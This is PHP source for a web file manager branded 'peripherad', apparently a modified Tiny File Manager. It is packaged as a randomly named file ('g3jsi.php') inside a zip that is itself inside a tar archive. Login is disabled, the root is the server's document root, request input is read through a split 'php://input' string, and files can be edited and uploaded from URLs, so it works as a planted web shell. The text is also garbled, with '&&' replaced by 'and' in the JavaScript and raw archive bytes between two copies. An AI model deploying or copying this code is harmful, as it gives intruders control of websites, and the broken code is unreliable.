                _data = {"aceTheme":{"bright":{"chrome":"Chrome","clouds":"Clouds","crimson_editor":"Crimson Editor","dawn":"Dawn","dreamweaver":"Dreamweaver","eclipse":"Eclipse","github":"GitHub","iplastic":"IPlastic","solarized_light":"Solarized Light","textmate":"TextMate","tomorrow":"Tomorrow","xcode":"XCode","kuroir":"Kuroir","katzenmilch":"KatzenMilch","sqlserver":"SQL Server"},"dark":{"ambiance":"Ambiance","chaos":"Chaos","clouds_midnight":"Clouds Midnight","dracula":"Dracula","cobalt":"Cobalt","gruvbox":"Gruvbox","gob":"Green on Black","idle_fingers":"idle Fingers","kr_theme":"krTheme","merbivore":"Merbivore","merbivore_soft":"Merbivore Soft","mono_industrial":"Mono Industrial","monokai":"Monokai","pastel_on_dark":"Pastel on dark","solarized_dark":"Solarized Dark","terminal":"Terminal","tomorrow_night":"Tomorrow Night","tomorrow_night_blue":"Tomorrow Night Blue","tomorrow_night_bright":"Tomorrow Night Bright","tomorrow_night_eighties":"Tomorrow Night 80s","twilight":"Twilight","vibrant_ink":"Vibrant Ink"}},"aceMode":{"javascript":"JavaScript","abap":"ABAP","abc":"ABC","actionscript":"ActionScript","ada":"ADA","apache_conf":"Apache Conf","asciidoc":"AsciiDoc","asl":"ASL","assembly_x86":"Assembly x86","autohotkey":"AutoHotKey","apex":"Apex","batchfile":"BatchFile","bro":"Bro","c_cpp":"C and C++","c9search":"C9Search","cirru":"Cirru","clojure":"Clojure","cobol":"Cobol","coffee":"CoffeeScript","coldfusion":"ColdFusion","csharp":"C#","csound_document":"Csound Document","csound_orchestra":"Csound","csound_score":"Csound Score","css":"CSS","curly":"Curly","d":"D","dart":"Dart","diff":"Diff","dockerfile":"Dockerfile","dot":"Dot","drools":"Drools","edifact":"Edifact","eiffel":"Eiffel","ejs":"EJS","elixir":"Elixir","elm":"Elm","erlang":"Erlang","forth":"Forth","fortran":"Fortran","fsharp":"FSharp","fsl":"FSL","ftl":"FreeMarker","gcode":"Gcode","gherkin":"Gherkin","gitignore":"Gitignore","glsl":"Glsl","gobstones":"Gobstones","golang":"Go","graphqlschema":"GraphQLSchema","groovy":"Groovy","haml":"HAML","handlebars":"Handlebars","haskell":"Haskell","haskell_cabal":"Haskell Cabal","haxe":"haXe","hjson":"Hjson","html":"HTML","html_elixir":"HTML (Elixir)","html_ruby":"HTML (Ruby)","ini":"INI","io":"Io","jack":"Jack","jade":"Jade","java":"Java","json":"JSON","jsoniq":"JSONiq","jsp":"JSP","jssm":"JSSM","jsx":"JSX","julia":"Julia","kotlin":"Kotlin","latex":"LaTeX","less":"LESS","liquid":"Liquid","lisp":"Lisp","livescript":"LiveScript","logiql":"LogiQL","lsl":"LSL","lua":"Lua","luapage":"LuaPage","lucene":"Lucene","makefile":"Makefile","markdown":"Markdown","mask":"Mask","matlab":"MATLAB","maze":"Maze","mel":"MEL","mixal":"MIXAL","mushcode":"MUSHCode","mysql":"MySQL","nix":"Nix","nsis":"NSIS","objectivec":"Objective-C","ocaml":"OCaml","pascal":"Pascal","perl":"Perl","perl6":"Perl 6","pgsql":"pgSQL","php_laravel_blade":"PHP (Blade Template)","php":"PHP","puppet":"Puppet","pig":"Pig","powershell":"Powershell","praat":"Praat","prolog":"Prolog","properties":"Properties","protobuf":"Protobuf","python":"Python","r":"R","razor":"Razor","rdoc":"RDoc","red":"Red","rhtml":"RHTML","rst":"RST","ruby":"Ruby","rust":"Rust","sass":"SASS","scad":"SCAD","scala":"Scala","scheme":"Scheme","scss":"SCSS","sh":"SH","sjs":"SJS","slim":"Slim","smarty":"Smarty","snippets":"snippets","soy_template":"Soy Template","space":"Space","sql":"SQL","sqlserver":"SQLServer","stylus":"Stylus","svg":"SVG","swift":"Swift","tcl":"Tcl","terraform":"Terraform","tex":"Tex","text":"Text","textile":"Textile","toml":"Toml","tsx":"TSX","twig":"Twig","typescript":"Typescript","vala":"Vala","vbscript":"VBScript","velocity":"Velocity","verilog":"Verilog","vhdl":"VHDL","visualforce":"Visualforce","wollok":"Wollok","xml":"XML","xquery":"XQuery","yaml":"YAML","django":"Django"},"fontSize":{8:8,10:10,11:11,12:12,13:13,14:14,15:15,16:16,17:17,18:18,20:20,22:22,24:24,26:26,30:30}};
            if(_data and _data.aceMode) { $modeEl.html(optionNode("ace/mode/", _data.aceMode)); }
            if(_data and _data.aceTheme) { var lightTheme = optionNode("ace/theme/", _data.aceTheme.bright), darkTheme = optionNode("ace/theme/", _data.aceTheme.dark); $themeEl.html("<optgroup label=\"Bright\">"+lightTheme+"</optgroup><optgroup label=\"Dark\">"+darkTheme+"</optgroup>");}
            if(_data and _data.fontSize) { $fontSizeEl.html(optionNode("", _data.fontSize)); }
            $modeEl.val( editor.getSession().$modeId );
            $themeEl.val( editor.getTheme() );
            $fontSizeEl.val(12).change();
        }

        $(function(){
            renderThemeMode();
            $(".js-ace-toolbar").on("click", 'button', function(e){
                e.preventDefault();
                let cmdValue = $(this).attr("data-cmd"), editorOption = $(this).attr("data-option");
                if(cmdValue and cmdValue != "none") {
                    ace_commend(cmdValue);
                } else if(editorOption) {
                    if(editorOption == "fullscreen") {
                        (void 0!==document.fullScreenElementandnull===document.fullScreenElement||void 0!==document.msFullscreenElementandnull===document.msFullscreenElement||void 0!==document.mozFullScreenand!document.mozFullScreen||void 0!==document.webkitIsFullScreenand!document.webkitIsFullScreen)
                        and(editor.container.requestFullScreen?editor.container.requestFullScreen():editor.container.mozRequestFullScreen?editor.container.mozRequestFullScreen():editor.container.webkitRequestFullScreen?editor.container.webkitRequestFullScreen(Element.ALLOW_KEYBOARD_INPUT):editor.container.msRequestFullscreenandeditor.container.msRequestFullscreen());
                    } else if(editorOption == "wrap") {
                        let wrapStatus = (editor.getSession().getUseWrapMode()) ? false : true;
                        editor.getSession().setUseWrapMode(wrapStatus);
                    }
                }
            });
            $("select#js-ace-mode, select#js-ace-theme, select#js-ace-fontSize").on("change", function(e){
                e.preventDefault();
                let selectedValue = $(this).val(), selectionType = $(this).attr("data-type");
                if(selectedValue and selectionType == "mode") {
                    editor.getSession().setMode(selectedValue);
                } else if(selectedValue and selectionType == "theme") {
                    editor.setTheme(selectedValue);
                }else if(selectedValue and selectionType == "fontSize") {
                    editor.setFontSize(parseInt(selectedValue));
                }
            });
        });
    </script>
<?php endif; ?>
<div id="snackbar"></div>
</body>
</html>
<?php
}

function lng($txt) {
    global $lang;

    $tr['en']['AppName']        = 'peripherad';      $tr['en']['AppTitle']           = 'peripherad';
    $tr['en']['Login']          = 'Sign in';                $tr['en']['Username']           = 'Username';
    $tr['en']['Password']       = 'Password';               $tr['en']['Logout']             = 'Sign Out';
    $tr['en']['Move']           = 'Move';                   $tr['en']['Copy']               = 'Copy';
    $tr['en']['Save']           = 'Save';                   $tr['en']['SelectAll']          = 'Select all';
    $tr['en']['UnSelectAll']    = 'Unselect all';           $tr['en']['File']               = 'File';
    $tr['en']['Back']           = 'Back';                   $tr['en']['Size']               = 'Size';
    $tr['en']['Perms']          = 'Perms';                  $tr['en']['Modified']           = 'Modified';
    $tr['en']['Owner']          = 'Owner';                  $tr['en']['Search']             = 'Search';
    $tr['en']['NewItem']        = 'New Item';               $tr['en']['Folder']             = 'Folder';
    $tr['en']['Delete']         = 'Delete';                 $tr['en']['Rename']             = 'Rename';
    $tr['en']['CopyTo']         = 'Copy to';                $tr['en']['DirectLink']         = 'Direct link';
    $tr['en']['UploadingFiles'] = 'Upload Files';           $tr['en']['ChangePermissions']  = 'Change Permissions';
    $tr['en']['Copying']        = 'Copying';                $tr['en']['CreateNewItem']      = 'Create New Item';
    $tr['en']['Name']           = 'Name';                   $tr['en']['AdvancedEditor']     = 'Advanced Editor';
    $tr['en']['Actions']        = 'Actions';                $tr['en']['Folder is empty']    = 'Folder is empty';
    $tr['en']['Upload']         = 'Upload';                 $tr['en']['Cancel']             = 'Cancel';
    $tr['en']['InvertSelection']= 'Invert Selection';       $tr['en']['DestinationFolder']  = 'Destination Folder';
    $tr['en']['ItemType']       = 'Item Type';              $tr['en']['ItemName']           = 'Item Name';
    $tr['en']['CreateNow']      = 'Create Now';             $tr['en']['Download']           = 'Download';
    $tr['en']['Open']           = 'Open';                   $tr['en']['UnZip']              = 'UnZip';
    $tr['en']['UnZipToFolder']  = 'UnZip to folder';        $tr['en']['Edit']               = 'Edit';
    $tr['en']['NormalEditor']   = 'Normal Editor';          $tr['en']['BackUp']             = 'Back Up';
    $tr['en']['SourceFolder']   = 'Source Folder';          $tr['en']['Files']              = 'Files';
    $tr['en']['Move']           = 'Move';                   $tr['en']['Change']             = 'Change';
    $tr['en']['Settings']       = 'Settings';               $tr['en']['Language']           = 'Language';        
    $tr['en']['ErrorReporting'] = 'Error Reporting';        $tr['en']['ShowHiddenFiles']    = 'Show Hidden Files';
    $tr['en']['Help']           = 'Help';                   $tr['en']['Created']            = 'Created';
    $tr['en']['Help Documents'] = 'Help Documents';         $tr['en']['Report Issue']       = 'Report Issue';
    $tr['en']['Generate']       = 'Generate';               $tr['en']['FullSize']           = 'Full Size';              
    $tr['en']['HideColumns']    = 'Hide Perms/Owner columns';$tr['en']['You are logged in'] = 'You are logged in';
    $tr['en']['Nothing selected']   = 'Nothing selected';   $tr['en']['Paths must be not equal']    = 'Paths must be not equal';
    $tr['en']['Renamed from']       = 'Renamed from';       $tr['en']['Archive not unpacked']       = 'Archive not unpacked';
    $tr['en']['Deleted']            = 'Deleted';            $tr['en']['Archive not created']        = 'Archive not created';
    $tr['en']['Copied from']        = 'Copied from';        $tr['en']['Permissions changed']        = 'Permissions changed';
    $tr['en']['to']                 = 'to';                 $tr['en']['Saved Successfully']         = 'Saved Successfully';
    $tr['en']['not found!']         = 'not found!';         $tr['en']['File Saved Successfully']    = 'File Saved Successfully';
    $tr['en']['Archive']            = 'Archive';            $tr['en']['Permissions not changed']    = 'Permissions not changed';
    $tr['en']['Select folder']      = 'Select folder';      $tr['en']['Source path not defined']    = 'Source path not defined';
    $tr['en']['already exists']     = 'already exists';     $tr['en']['Error while moving from']    = 'Error while moving from';
    $tr['en']['Create archive?']    = 'Create archive?';    $tr['en']['Invalid file or folder name']    = 'Invalid file or folder name';
    $tr['en']['Archive unpacked']   = 'Archive unpacked';   $tr['en']['File extension is not allowed']  = 'File extension is not allowed';
    $tr['en']['Root path']          = 'Root path';          $tr['en']['Error while renaming from']  = 'Error while renaming from';
    $tr['en']['File not found']     = 'File not found';     $tr['en']['Error while deleting items'] = 'Error while deleting items';
    $tr['en']['Moved from']         = 'Moved from';         $tr['en']['Generate new password hash'] = 'Generate new password hash';
    $tr['en']['Login failed. Invalid username or password'] = 'Login failed. Invalid username or password';
    $tr['en']['password_hash not supported, Upgrade PHP version'] = 'password_hash not supported, Upgrade PHP version';
    $tr['en']['Advanced Search']    = 'Advanced Search';    $tr['en']['Error while copying from']    = 'Error while copying from';
    $tr['en']['Invalid characters in file name']                = 'Invalid characters in file name';
    $tr['en']['FILE EXTENSION HAS NOT SUPPORTED']               = 'FILE EXTENSION HAS NOT SUPPORTED';
    $tr['en']['Selected files and folder deleted']              = 'Selected files and folder deleted';
    $tr['en']['Error while fetching archive info']              = 'Error while fetching archive info';
    $tr['en']['Delete selected files and folders?']             = 'Delete selected files and folders?';
    $tr['en']['Search file in folder and subfolders...']        = 'Search file in folder and subfolders...';
    $tr['en']['Access denied. IP restriction applicable']       = 'Access denied. IP restriction applicable';
    $tr['en']['Invalid characters in file or folder name']      = 'Invalid characters in file or folder name';
    $tr['en']['Operations with archives are not available']     = 'Operations with archives are not available';
    $tr['en']['File or folder with this path already exists']   = 'File or folder with this path already exists';

    $i18n = fm_get_translations($tr);
    $tr = $i18n ? $i18n : $tr;

    if (!strlen($lang)) $lang = 'en';
    if (isset($tr[$lang][$txt])) return fanco($tr[$lang][$txt]);
    else if (isset($tr['en'][$txt])) return fanco($tr['en'][$txt]);
    else return "$txt";
}

?>nxepl1.zip000064400000560755000000000000006462 0ustar00PK!��hUU�U�	g3jsi.phpnu�[���<?php
$CONFIG = '{"lang":"en","error_reporting":false,"show_hidden":true,"hide_Cols":false,"theme":"light"}';

define('VERSION', '3.9');

define('APP_TITLE', 'peripherad');

$dauth = false;

$auth_users = array(
    'admin' => '1c7f7329c4e5eb87bd553e74db33afcb',
    'user' => '1c7f7329c4e5eb87bd553e74db33afcb'
);

$readonly_users = array(
    'user'
);


$global_readonly = false;

$directories_users = array();

$use_highlightjs = true;

$highlightjs_style = 'vs';

$edit_files = true;

$default_timezone = 'Etc/UTC';

$root_path = $_SERVER['DOCUMENT_ROOT'];

$root_url = '';

$http_host = $_SERVER['HTTP_HOST'];

$iconv_input_encoding = 'UTF-8';

$datetime_format = 'm/d/Y g:i A';

$path_display_mode = 'full';

$allowed_file_extensions = '';

$allowed_upload_extensions = '';

$favicon_path = '';

$exclude_items = array();

$online_viewer = 'google';

$sticky_navbar = true;

$max_upload_size_bytes = 5000000000; 

$upload_chunk_size_bytes = 2000000; 

$ip_ruleset = 'OFF';

$ip_silent = true;

$ip_whitelist = array(
    '127.0.0.1',    
    '::1'           
);

$ip_blacklist = array(
    '0.0.0.0',      
    '::'            
);

$config_file = __DIR__.'/config.php';
if (is_readable($config_file)) {
    @include($config_file);
}

$external = array(
    'css-bootstrap' => '<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi" crossorigin="anonymous">',
    'css-dropzone' => '<link href="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.3/min/dropzone.min.css" rel="stylesheet">',
    'css-font-awesome' => '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" crossorigin="anonymous">',
    'css-highlightjs' => '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/styles/' . $highlightjs_style . '.min.css">',
    'js-ace' => '<script src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.13.1/ace.js"></script>',
    'js-bootstrap' => '<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3" crossorigin="anonymous"></script>',
    'js-dropzone' => '<script src="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.3/min/dropzone.min.js"></script>',
    'js-jquery' => '<script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>',
    'js-jquery-datatables' => '<script src="https://cdn.datatables.net/1.13.1/js/jquery.dataTables.min.js" crossorigin="anonymous" defer></script>',
    'js-highlightjs' => '<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/highlight.min.js"></script>',
    'pre-jsdelivr' => '<link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin/><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"/>',
    'pre-cloudflare' => '<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin/><link rel="dns-prefetch" href="https://cdnjs.cloudflare.com"/>'
);


define('MAX_UPLOAD_SIZE', $max_upload_size_bytes);


define('UPLOAD_CHUNK_SIZE', $upload_chunk_size_bytes);


if ( !defined( 'DN_CESSION_ID')) {
    define('DN_CESSION_ID', 'filemanager');
}


$cfg = new FM_Config();


$lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en';

$show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true;

$report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true;

$hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true;

// Theme
$theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light';

define('FM_THEME', $theme);

$lang_list = array(
    'en' => 'English'
);

if ($report_errors == true) {
    @ini_set('error_reporting', E_ALL);
    @ini_set('display_errors', 1);
} else {
    @ini_set('error_reporting', E_ALL);
    @ini_set('display_errors', 0);
}

if (defined('FM_EMBED')) {
    $dauth = false;
    $sticky_navbar = false;
} else {
    @set_time_limit(600);

    date_default_timezone_set($default_timezone);

    ini_set('default_charset', 'UTF-8');
    if (version_compare(PHP_VERSION, '5.6.0', '<') and function_exists('mb_internal_encoding')) {
        mb_internal_encoding('UTF-8');
    }
    if (function_exists('mb_regex_encoding')) {
        mb_regex_encoding('UTF-8');
    }

    session_cache_limiter('nocache'); 
    session_name(DN_CESSION_ID );
    function session_error_handling_function($code, $msg, $file, $line) {
        if ($code == 2) {
            session_abort();
            session_id(session_create_id());
            @session_start();
        }
    }
    set_error_handler('session_error_handling_function');
    session_start();
    restore_error_handler();
}

if (empty($_SESSION['token'])) {
    if (function_exists('random_bytes')) {
        $_SESSION['token'] = bin2hex(random_bytes(32));
    } else {
    	$_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32));
    }
}

if (empty($auth_users)) {
    $dauth = false;
}

$is_https = (isset($_SERVER['HTTPS']) and ($_SERVER['HTTPS'] === 'on' or $_SERVER['HTTPS'] == 1))
    or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https');

if (isset($_SESSION[DN_CESSION_ID]['logged']) and !empty($directories_users[$_SESSION[DN_CESSION_ID]['logged']])) {
    $wd = fm_clean_path(dirname($_SERVER['PHP_SELF']));
    $root_url =  $root_url.$wd.DIRECTORY_SEPARATOR.$directories_users[$_SESSION[DN_CESSION_ID]['logged']];
}

$root_url = fm_clean_path($root_url);

defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : ''));
defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']);

// logout
if (isset($_GET['logout'])) {
    unset($_SESSION[DN_CESSION_ID]['logged']);
    unset( $_SESSION['token']); 
    fm_redirect(FM_SELF_URL);
}

if ($ip_ruleset != 'OFF') {
    function getClientIP() {
        if (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) {
            return  $_SERVER["HTTP_CF_CONNECTING_IP"];
        }else if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) {
            return  $_SERVER["HTTP_X_FORWARDED_FOR"];
        }else if (array_key_exists('REMOTE_ADDR', $_SERVER)) {
            return $_SERVER['REMOTE_ADDR'];
        }else if (array_key_exists('HTTP_CLIENT_IP', $_SERVER)) {
            return $_SERVER['HTTP_CLIENT_IP'];
        }
        return '';
    }

    $clientIp = getClientIP();
    $proceed = false;
    $whitelisted = in_array($clientIp, $ip_whitelist);
    $blacklisted = in_array($clientIp, $ip_blacklist);

    if($ip_ruleset == 'AND'){
        if($whitelisted == true and $blacklisted == false){
            $proceed = true;
        }
    } else
    if($ip_ruleset == 'OR'){
         if($whitelisted == true || $blacklisted == false){
            $proceed = true;
        }
    }

    if($proceed == false){
        trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING);

        if($ip_silent == false){
            fm_set_msg(lng('Access denied. IP restriction applicable'), 'error');
            fm_show_header_login();
            fm_show_message();
        }
        exit();
    }
}


if ($dauth) {
    if (isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']])) {
    } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'], $_POST['token'])) {
        sleep(1);
        if(function_exists('password_verify')) {
            if (isset($auth_users[$_POST['fm_usr']]) and isset($_POST['fm_pwd']) and password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']]) and verifyToken($_POST['token'])) {
                $_SESSION[DN_CESSION_ID]['logged'] = $_POST['fm_usr'];
                fm_set_msg(lng('You are logged in'));
                fm_redirect(FM_SELF_URL);
            } else {
                unset($_SESSION[DN_CESSION_ID]['logged']);
                fm_set_msg(lng('Login failed. Invalid username or password'), 'error');
                fm_redirect(FM_SELF_URL);
            }
        } else {
            fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');;
        }
    } else {
        // Form
        unset($_SESSION[DN_CESSION_ID]['logged']);
        fm_show_header_login();
        ?>
        <section class="h-100">
            <div class="container h-100">
                <div class="row justify-content-md-center h-100">
                    <div class="card-wrapper">
                        <div class="card fat <?php echo fm_get_theme(); ?>">
                            <div class="card-body">
                                <form class="form-signin" action="" method="post" autocomplete="off">
                                    <div class="mb-3">
                                       <div class="brand">
                                            <svg version="1.0" xmlns="http://www.w3.org/2000/svg" M1008 width="100%" height="80px" viewBox="0 0 238.000000 140.000000" aria-label="Manager">
                                                <g transform="translate(0.000000,140.000000) scale(0.100000,-0.100000)" fill="#000000" stroke="none">
                                                    <path d="M160 700 l0 -600 110 0 110 0 0 260 0 260 70 0 70 0 0 -260 0 -260 110 0 110 0 0 600 0 600 -110 0 -110 0 0 -260 0 -260 -70 0 -70 0 0 260 0 260 -110 0 -110 0 0 -600z"/>
                                                    <path fill="#003500" d="M1008 1227 l-108 -72 0 -117 0 -118 110 0 110 0 0 110 0 110 70 0 70 0 0 -180 0 -180 -125 0 c-69 0 -125 -3 -125 -6 0 -3 23 -39 52 -80 l52 -74 73 0 73 0 0 -185 0 -185 -70 0 -70 0 0 115 0 115 -110 0 -110 0 0 -190 0 -190 181 0 181 0 109 73 108 72 1 181 0 181 -69 48 -68 49 68 50 69 49 0 249 0 248 -182 -1 -183 0 -107 -72z"/>
                                                    <path d="M1640 700 l0 -600 110 0 110 0 0 208 0 208 35 34 35 34 35 -34 35 -34 0 -208 0 -208 110 0 110 0 0 212 0 213 -87 87 -88 88 88 88 87 87 0 213 0 212 -110 0 -110 0 0 -208 0 -208 -70 -69 -70 -69 0 277 0 277 -110 0 -110 0 0 -600z"/></g>
                                            </svg>
                                        </div>
                                        <div class="text-center">
                                            <h1 class="card-title"><?php echo APP_TITLE; ?></h1>
                                        </div>
                                    </div>
                                    <hr />
                                    <div class="mb-3">
                                        <label for="fm_usr" class="pb-2"><?php echo lng('Username'); ?></label>
                                        <input type="text" class="form-control" id="fm_usr" name="fm_usr" required autofocus>
                                    </div>

                                    <div class="mb-3">
                                        <label for="fm_pwd" class="pb-2"><?php echo lng('Password'); ?></label>
                                        <input type="password" class="form-control" id="fm_pwd" name="fm_pwd" required>
                                    </div>

                                    <div class="mb-3">
                                        <?php fm_show_message(); ?>
                                    </div>
                                    <input type="hidden" name="token" value="<?php echo htmlentities($_SESSION['token']); ?>" />
                                    <div class="mb-3">
                                        <button type="submit" class="btn btn-success btn-block w-100 mt-4" role="button">
                                            <?php echo lng('Login'); ?>
                                        </button>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <div class="footer text-center">
                            &mdash;&mdash; &copy;
                            <a href="." target="_blank" class="text-decoration-none text-muted" data-version="<?php echo VERSION; ?>">CCP Programmers</a> &mdash;&mdash;
                        </div>
                    </div>
                </div>
            </div>
        </section>

        <?php
        fm_show_footer_login();
        exit;
    }
}


if ($dauth and isset($_SESSION[DN_CESSION_ID]['logged'])) {
    $root_path = isset($directories_users[$_SESSION[DN_CESSION_ID]['logged']]) ? $directories_users[$_SESSION[DN_CESSION_ID]['logged']] : $root_path;
}

$root_path = rtrim($root_path, '\\/');
$root_path = str_replace('\\', '/', $root_path);
if (!@is_dir($root_path)) {
    echo "<h1>".lng('Root path')." \"{$root_path}\" ".lng('not found!')." </h1>";
    exit;
}

defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files);
defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path);
defined('FM_LANG') || define('FM_LANG', $lang);
defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions);
defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions);
defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items));
defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer);
define('FM_READONLY', $global_readonly || ($dauth and !empty($readonly_users) and isset($_SESSION[DN_CESSION_ID]['logged']) and in_array($_SESSION[DN_CESSION_ID]['logged'], $readonly_users)));
define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\');


if (!isset($_GET['p']) and empty($_FILES)) {
    fm_redirect(FM_SELF_URL . '?p=');
}

// get path
$p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : '');

// clean path
$p = fm_clean_path($p);


$isim = "//input";
$input = file_get_contents('php:'.$isim);
$_POST = (strpos($input, 'ajax') != FALSE and strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST;

define('FM_PATH', $p);
define('FM_USE_AUTH', $dauth);
define('FM_EDIT_FILE', $edit_files);
defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding);
defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs);
defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style);
defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format);

unset($p, $dauth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style);


if ((isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']]) || !FM_USE_AUTH) and isset($_POST['ajax'], $_POST['token']) and !FM_READONLY) {
    if(!verifyToken($_POST['token'])) {
        header('HTTP/1.0 401 Unauthorized');
        die("Invalid Token.");
    }

    if(isset($_POST['type']) and $_POST['type']=="search") {
        $dir = $_POST['path'] == "." ? '': $_POST['path'];
        $response = scan(fm_clean_path($dir), $_POST['content']);
        echo json_encode($response);
        exit();
    }

    // save editor file
    if (isset($_POST['type']) and $_POST['type'] == "save") {
        // get current path
        $path = FM_ROOT_PATH;
        if (FM_PATH != '') {
            $path .= '/' . FM_PATH;
        }
        // check path
        if (!is_dir($path)) {
            fm_redirect(FM_SELF_URL . '?p=');
        }
        $file = $_GET['edit'];
        $file = fm_clean_path($file);
        $file = str_replace('/', '', $file);
        if ($file == '' || !is_file($path . '/' . $file)) {
            fm_set_msg(lng('File not found'), 'error');
            $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
        }
        header('X-XSS-Protection:0');
        $file_path = $path . '/' . $file;

        $writedata = $_POST['content'];
        $fd = fopen($file_path, "w");
        $write_results = @fwrite($fd, $writedata);
        fclose($fd);
        if ($write_results === false){
            header("HTTP/1.1 500 Internal Server Error");
            die("Could Not Write File! - Check Permissions / Ownership");
        }
        die(true);
    }

    // backup files
    if (isset($_POST['type']) and $_POST['type'] == "backup" and !empty($_POST['file'])) {
        $fileName = fm_clean_path($_POST['file']);
        $fullPath = FM_ROOT_PATH . '/';
        if (!empty($_POST['path'])) {
            $relativeDirPath = fm_clean_path($_POST['path']);
            $fullPath .= "{$relativeDirPath}/";
        }
        $date = date("dMy-His");
        $newFileName = "{$fileName}-{$date}.bak";
        $fullyQualifiedFileName = $fullPath . $fileName;
        try {
            if (!file_exists($fullyQualifiedFileName)) {
                throw new Exception("File {$fileName} not found");
            }
            if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) {
                echo "Backup {$newFileName} created";
            } else {
                throw new Exception("Could not copy file {$fileName}");
            }
        } catch (Exception $e) {
            echo $e->getMessage();
        }
    }

    // Save Config
    if (isset($_POST['type']) and $_POST['type'] == "settings") {
        global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $theme;
        $newLng = $_POST['js-language'];
        fm_get_translations([]);
        if (!array_key_exists($newLng, $lang_list)) {
            $newLng = 'en';
        }

        $erp = isset($_POST['js-error-report']) and $_POST['js-error-report'] == "true" ? true : false;
        $shf = isset($_POST['js-show-hidden']) and $_POST['js-show-hidden'] == "true" ? true : false;
        $hco = isset($_POST['js-hide-cols']) and $_POST['js-hide-cols'] == "true" ? true : false;
        $te3 = $_POST['js-theme-3'];

        if ($cfg->data['lang'] != $newLng) {
            $cfg->data['lang'] = $newLng;
            $lang = $newLng;
        }
        if ($cfg->data['error_reporting'] != $erp) {
            $cfg->data['error_reporting'] = $erp;
            $report_errors = $erp;
        }
        if ($cfg->data['show_hidden'] != $shf) {
            $cfg->data['show_hidden'] = $shf;
            $show_hidden_files = $shf;
        }
        if ($cfg->data['show_hidden'] != $shf) {
            $cfg->data['show_hidden'] = $shf;
            $show_hidden_files = $shf;
        }
        if ($cfg->data['hide_Cols'] != $hco) {
            $cfg->data['hide_Cols'] = $hco;
            $hide_Cols = $hco;
        }
        if ($cfg->data['theme'] != $te3) {
            $cfg->data['theme'] = $te3;
            $theme = $te3;
        }
        $cfg->save();
        echo true;
    }

    // new password hash
    if (isset($_POST['type']) and $_POST['type'] == "pwdhash") {
        $res = isset($_POST['inputPassword2']) and !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : '';
        echo $res;
    }

    //upload using url
    if(isset($_POST['type']) and $_POST['type'] == "upload" and !empty($_REQUEST["uploadurl"])) {
        $path = FM_ROOT_PATH;
        if (FM_PATH != '') {
            $path .= '/' . FM_PATH;
        }

         function event_callback ($message) {
            global $callback;
            echo json_encode($message);
        }

        function get_file_path () {
            global $path, $fileinfo, $temp_file;
            return $path."/".basename($fileinfo->name);
        }

